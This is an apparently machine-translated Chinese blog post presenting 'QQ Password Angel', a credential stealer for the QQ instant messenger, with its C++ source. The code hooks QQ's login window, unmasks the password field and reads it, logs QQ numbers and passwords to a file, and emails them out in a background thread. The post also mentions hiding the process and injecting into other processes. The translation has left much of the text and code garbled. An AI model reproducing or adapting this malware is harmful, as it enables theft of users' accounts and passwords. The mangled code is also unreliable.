The first line stated that this procedure is completely interest, it is a summary of his own studies! The program has not been published, after all, how much is a little harmful! L is only called "Password Angel", 嘻嘻, image spread! Let you notice so much ID, password, natural a bit angel's ingredient!嘻嘻 ~~~~~ The program running interface is as follows: Figure 1 The program has the process pseudo-hidden (1.1 version can be hidden), hotkey exhalation, email send and other functions! There are two parts, Exe, DLL, DLL is not to use the hook, because the QQ version continues to improve, so find the QQ window to judge! But there is a different requirement for different QQ versions, like the judgment below, "Clear ..." The QQ version of the species is effective! (Thanks here to Titilima's help)! Of course, the program is residing in memory, I use the Timer event to monitor the QQ window! The program part is as follows:
HWND G_HQQ; // qq window handle
Void cgetqqworddlg :: Ontimer (uint nidevent)
{
IF (! iswindow (g_hqq))
{
HWnd hsend; // "Login" sub-window handle
HWND HNEXT; / / "Next" sub-window handle
G_HQQ = NULL;
m_hook.starthook (null);
DO
{
g_hqq = findwindowex (NULL, G_HQQ, "# 32770", null);
Hsend = FindWindowEx (G_HQQ, NULL, "Button", "Clear ...");
HNEXT = FindWindowEx (G_HQQ, NULL, "Button", "Next (& N)>");
}
While (g_hqq! = null && hsend == null && hnext == NULL);
IF (g_hqq! = null) // Discover QQ window
{
m_hook.starthook (g_hqq); // Set hook
}
}
}
After setting the hook, go to the DLL with the program, have any good looking (how can you know?) Please pay attention to each road! I will set the hook and close the hook. CGETQHOOK! Object Programming is good, let you analyze!
Bool cgetqqide :: StartHook (hwnd hqq)
{
IF (hqq! = null)
{
SHQQ = HQQ; // Change the value of SHQQ in the shared section DWORD DWTHREADID = getWindowThreadProcessID (hqq, null); // Get the thread ID in QQ
Hproc = setwindowshookex (wh_callwndproc, caverwndproc, glhinstance, dwthreadid); //
IF (HPROC)
Return True;
}
Else
{
Stophook ();
}
Return False;
}
I use the hooks that are wh_callwndproc. Before the operating system sends the message to the process window function, the message should be passed through the hook, and the judgment is not a button message. If so, enumerate the current main window, find out the password and user Features sub-window. (When you find the button ID, you have used SPY ) to record! Ok! Don't feel that you have made a big half! Jhwnd hwd = null; //
LResult WinAPI CallWndProc (int Ncode, WPARAM WPARAM, LPARAM LPARAM)
{
IF (ncode == hc_action)
{
CWPSTRUCT * P = (cwpstruct *) LPARAM;
HWND htargethwnd = shqq; // Detection handle if (p-> message == wm_command) // capture command
{
IF ((P-> WPARAM) == 1) || (Loword (P-> WPARAM) == 0x00003024)) {
IF (hw == null)
{
HWD = SHQQ;
:: EnumchildWindows (HtargethWnd, EnumWndProc, 0);
}
IF (hwd == shqq) // if it is the same window
Return CallNexthookex (HProc, Ncode, WPARAM, LPARAM);
}
}
Return CallNexthookex (HProc, Ncode, WPARAM, LPARAM);
}
When enumerating the window, if you are the password box, first remove your password properties, then take content (otherwise there is trouble under the NT system), there is a very important issue, because the transmission function is used, After the password is recorded to 10, the call sending function will have a stagnation, so it has opened a thread and slowing this phenomenon!
Bool WinApi EnumWndProc (HWND HWND, LPARAM LPARAM)
{
Char swindowclass [256];
Cstring strwindowclass;
CString strwindowname;
:: getClassName (HWND, SWINDOWCLASS, 256);
StrwindowClass.ReleaseBuffer ();
StrwindowClass = SWINDOWCLASS;
OFSTREAM Fout;
Char cpath [512];
:: GetCurrentDirectory (512, CPATH);
Strcat (cpath, _t ("// kk.txt"))); // Remember, the current directory is the directory IF in QQ (StrWindowClass ==_T ("Edit"))
{
For (int i = 0; i <10; i )
{
Strwindowname = SWINDOWNAME [i];
IF (strwindowname.getlength () == 0)
Break;
}
IF (i <10) // has data from 0 to i's character array
{
Fout.Open (cpath, ios :: app);
DWORD style = getWindowlong (hwnd, gwl_style);
IF (Style & Es_Password)
{
Long NTYPE;
NTYPE = SendMessage (hwnd, em_getpasswordchar, 0, 0); PostMessage (hwnd, em_setpasswordchar, 0, 0); Sleep (100); // Stop 100 millisecond sendMessage (hwnd, wm_gettext, 256, (lparam) SWindowname [i]) Postmessage (hwnd, em_setpasswordchar, ntype, 0); fout << "Password:"; fout << Swindowname [i] << "/ n";
}
Else
{
IF ((Style & Es_Readonly) && (Style & WS_Visible))
{
:: SendMessage (hwnd, wm_gettext, 256, (lparam) SWINDOWNAME [I]);
Fout << "QQ number:"; fout << Swindowname [i] << "/ t / t";
}
}
Fout.close ();
}
Else
{
For (int K = 0; k <10; k )
STRCPY (STEMP [K], SWINDOWNAME [K]);
MEMSET (SWindowname, 0, 10 * 256);
AfxBeginthread (SendmailUseridpass, Null, Thread_Priority_NORMAL);
:: EnumchildWindows (:: getParent (hwnd), enumwndproc, 0);}
}
Return True;
}
// Full-time thread function
Uint SendmailUseridPass (LPVOID PPARAM)
{
Sendmyqqinfo (); // Send your password, ID
Return 0;
}
At this point, the main part of the program has been completed! But when you look at my source code, you will find that I have a lot of comments in the shared data segment, because I have received some setbacks in this place when I write this program, if I don't Too clearly to share data, I suggest you see Titilima's masterpiece "The Implementation of 'QQ Tail Virus' Core Technology", the image of this paper describes some details of the data sharing section. Http://home.nuc.edu.cn/-titilima/readArticle.php?id=23 later I used in the QQ Password Angel V1.1 I used memory mapping, because I think multiple DLLs and EXE share data When I feel that the memory with the memory map is passed to be clear! #Pragma data_seg ("wenboly")
HHOOK HPROC = NULL; / / Monitor the hook of a specific message
HWND SHQQ = NULL; // QQ handle char swindowname [10] [256] = {0};
#pragma data_seg () is placed in the shared section, which is shared by EXE and DLL, which changes to it affects all where it appears (a bit icon static variable).
For the mail sending part, I will quote someone else's class library, I will not explain, if you are interested in STL development, this class library can be good information! J
In addition, the program also has the read, write operation, window launch hidden, the hotkey of the window, is limited to the layout, I don't have to repeat it! In addition, in the 1.1 version I use the process injection technology (not a far process injection), Let EXens come to die again! It is inevitable, hoped to laugh! ® MINIKING
